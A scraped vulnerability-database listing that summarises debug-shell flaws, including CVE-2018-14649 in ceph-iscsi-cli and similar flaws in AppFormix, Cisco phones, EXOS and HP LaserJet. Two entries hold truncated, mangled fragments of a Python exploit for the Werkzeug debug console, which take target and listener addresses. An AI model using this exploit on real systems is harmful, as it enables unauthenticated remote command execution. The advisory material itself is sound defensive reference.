Red Hat Ceph Storage ceph-iscsi-cli package remote command injection vulnerability
Red Hat Ceph Storage is a suite of scalable, open software-defined storage platforms from Red Hat, Inc. ceph-iscsi-cli is one of its command-line programs. A security vulnerability exists in the ceph-iscsi-cli package in Red Hat Ceph Storage versions 2 and 3. An attacker could use this vulnerabilit...
CVE-2018-14649
It was found that the ceph-iscsi-cli package as shipped by Red Hat Ceph Storage 2 and 3 uses python-werkzeug in debug shell mode. This is done by setting debug=True in the file /usr/bin/rbd-target-api provided by the ceph-iscsi-cli package. This allows unauthenticated attackers to access this debug shell a...
Design/Logic Flaw
It was found that the ceph-iscsi-cli package as shipped by Red Hat Ceph Storage 2 and 3 uses python-werkzeug in debug shell mode. This is done by setting debug=True in the file /usr/bin/rbd-target-api provided by the ceph-iscsi-cli package. This allows unauthenticated attackers to access this debug shell a...
PT-2018-12640 · Pallets Projects +1 · Python-Werkzeug +1
Name of the Vulnerable Software and Affected Versions: Red Hat Ceph Storage versions 2 and 3
Description: The issue allows unauthenticated attackers to access a debug shell and escalate privileges. This is due to the ceph-iscsi-cli package using python-werkzeug in debug shell mode, enabled by...
CVE-2018-0015 AppFormix: Debug Shell Command Execution in AppFormix Agent
A malicious user with unrestricted access to the AppFormix application management platform may be able to access a Python debug console and execute system commands with root privilege. The AppFormix Agent exposes the debug console on a host where AppFormix Agent is executing. If the host is...
Werkzeug - 'Debug Shell' Command Execution
!/usr/bin/env python import requests import sys import re import urllib usage : python exploit.py 192.168.56.101 5000 192.168.56.102 4422 if lensys.argv != 5: print "USAGE: python %s " % sys.argv0 sys.exit-1 response = requests.get'http://%s:%s/console' % sys.argv1,sys.argv2 if "Werkzeug " not in...
Werkzeug - Debug Shell Command Execution
Werkzeug - Debug Shell Command Execution !/usr/bin/env python import requests import sys import re import urllib usage : python exploit.py 192.168.56.101 5000 192.168.56.102 4422 if lensys.argv != 5: print "USAGE: python %s " % sys.argv0 sys.exit-1 response = requests.get'http://%s:%s/console' %...
Cisco IP Phone 8800 Series Command Injection Vulnerability in Debug Shell
A vulnerability in the debug interface of Cisco IP Phone 8800 series could allow an authenticated, local attacker to execute arbitrary commands.
Cisco IP Phone 8800 Series Command Injection Vulnerability in Debug Shell
A vulnerability in the debug interface of Cisco IP Phone 8800 series could allow an authenticated, local attacker to execute arbitrary commands. The vulnerability is due to insufficient input validation. An attacker could exploit this vulnerability by authenticating to the device and submitting...
CVE-2017-14329
Extreme EXOS 16.x, 21.x, and 22.x allows administrators to obtain a root shell via vectors involving an exsh debug shell...
Design/Logic Flaw
Extreme EXOS 16.x, 21.x, and 22.x allows administrators to obtain a root shell via vectors involving an exsh debug shell...
Cisco Small Business SPA300 and SPA500 Series IP Phones Local Code Execution Vulnerability
A vulnerability in the Cisco Small Business SPA300 and SPA500 Series IP Phones could allow an unauthenticated, local attacker to access the debug shell and file system of the affected device. The vulnerability is due to insufficient authentication implementation in the debug console interface. An...
Design/Logic Flaw
The remote debug shell on the PALO adapter card in Cisco Unified Computing System (UCS) allows local users to gain privileges via malformed show-macstats parameters, aka Bug ID CSCub13772...
HP LaserJet Security flaw allows remote data access
A critical vulnerability discovered in certain LaserJet Pro printers that could give remote attackers access to sensitive data. Homeland Security's Computer Emergency Response Team recently issued a vulnerability note warning that HP LaserJet Professional printers contain a telnet debug shell whi...
HP LaserJet Professional printer telnet debug shell vulnerability
Overview: Certain HP LaserJet Professional printers contain a telnet debug shell which could allow a remote attacker to gain unauthorized access to data.
Description: Certain HP LaserJet Professional printers contain a telnet debug shell which could allow a remote attacker to gain unauthorized acce...